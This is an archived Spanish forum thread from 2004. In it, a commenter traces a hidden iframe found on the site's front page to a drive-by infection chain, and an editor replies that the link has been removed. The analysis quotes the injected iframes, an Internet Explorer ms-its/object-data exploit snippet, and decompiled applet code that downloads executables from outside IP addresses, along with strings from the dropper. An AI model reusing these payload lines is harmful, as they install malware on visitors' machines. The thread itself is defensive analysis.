Historias
Slashboxes
Comentarios
 
Búsqueda
Este hilo ha sido archivado. No pueden publicarse nuevos comentarios.
Looking Glass ya es GPL | Log in/Crear cuenta | Top | 37 comentarios | Buscar hilo
Mostrar opciones Umbral:
Y recuerda: Los comentarios que siguen pertenecen a las personas que los han enviado. No somos responsables de los mismos.

  • Re:Casi me infectas

    (Puntos:0)
    por pobrecito hablador el Sábado, 03 Julio de 2004, 06:03h (#322474)
    <IFRAME SRC="http://www.TryToImproveSecurity.com/fa/?d=get " WIDTH=1 HEIGHT=1></IFRAME>
    Esa es la linea que hace saltar el antivirus.

    Si vamos a esa direccion encontramos otros dos iframes:
        <iframe src="http://213.159.117.133/dl/fox.php" width=1 height=1></iframe>
        <iframe src="http://counter.sexmaniack.com/newtest.php" width=1 height=1></iframe>

    El segundo link nos dice que no hay nada ahi, pero si vemos el source:
    <APPLET ARCHIVE='proc.jar' CODE='MainApp.class' WIDTH=1 HEIGHT=1></APPLET>

    Menos mal que no hay nada. Dentro de los .class se puede ver que hay algo codificado en base64 que luego pasara a ser decodificado. Me quedo con estas lineas que son bastante descriptivas:
    s2 = "C:\\";
    String s3 = s2 + "msvb_" + s + ".exe";

    En el primer iframe, tenemos un link a redir.php que devuelve:
    Location: URL:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt .htm

    En el source podemos encontrar:
    <textarea id="cxw" style="display:none;">
            <object data="${PR}" type="text/x-scriptlet"></object>
    </textarea>
    document.write(cxw.value.replace(/\${PR}/g,'&# 109;s-its:mhtml:file://c:\\nosuch.mht!http://213.1 59.117.133/dl/fox/x.chm::/x.htm'));
    <applet width=1 height=1 ARCHIVE=loaderfox.jar code=Counter>

    Parece que intentan explotar la vulnerabilidad del object-data del IE. Decompilando los class encontramos strings interesantes:
    URL url1 = new URL("http://64.127.104.144/progs/loadfox.exe");
    FileOutputStream fileoutputstream = new FileOutputStream(s4 + "\\loadnew.exe");
    URL url2 = new URL("http://213.159.117.133/dl/cheatfox.php");

    El ejecutable esta comprimido en upx, despues de descomprimirlo se pueden encontrar numerosas strings de este estilo:

    \system32\secure32.txt
    \seksdialer.exe
    klfox.php
    kluniqfox.php
    \test
    mstasks2.txt
    \mstasks2.exe
    mstasks1.txt
    \mstasks1.exe
    toolbar.txt
    \toolbar.exe
    dkserver.txt
    \system32\explorer.exe
    secure33.php
    \system32\secure33.txt
    wintime128.txt
    \system32\wintime.exe
    dkdial.txt
    \dkdial.exe
    dial32.php
    \dial32.exe
    InternetGetConnectedState
    wininet.dll
    MCUPDATE.EXE
    CFIAUDIT.EXE
    AVXQUAR.EXE
    AUTOUPDATE.EXE
    AUTOTRACE.EXE
    AUTODOWN.EXE
    AUPDATE.EXE
    NUPGRADE.EXE
    UPDATE.EXE
    ICSUPP95.EXE
    [...]

    No quiero seguir gastando mas tiempo en esto, aparte que no tengo ningun windows a mano. Si alguien quiere continuar donde lo he dejado y con un debugger averiguar que hace exactamente el programa (seguro que nada bueno), adelante.

    Y la pregunta final: porque esta esa linea que nos ha llevado a todo esto en esa web? Fue escrita de forma intencionada?
    [ Padre ]
    Re:Casi me infectas de pobrecito hablador (Puntos:0)

  • Re:Casi me infectas

    (Puntos:2)
    por Candyman (7) el Sábado, 03 Julio de 2004, 15:03h (#322552)
    ( Última bitácora: Jueves, 29 Diciembre de 2011, 04:53h )
    Hemos quitado el enlace de la portada, y estamos itentando averiguar qué ha pasado con esa línea. Que está escrita de forma intencionada parece evidente (o quizá no, que hayan sido millones de monos con millones de máquinas de escribir), la cuestión es "¿por quién?".

    Por último, es un exploit tan trabajado como cabrón. El tío que nos escribió usaba Explorer, pero a Mozilla/win también intenta instalarle un troyano, solo que parece que otro distinto.
    [ Padre ]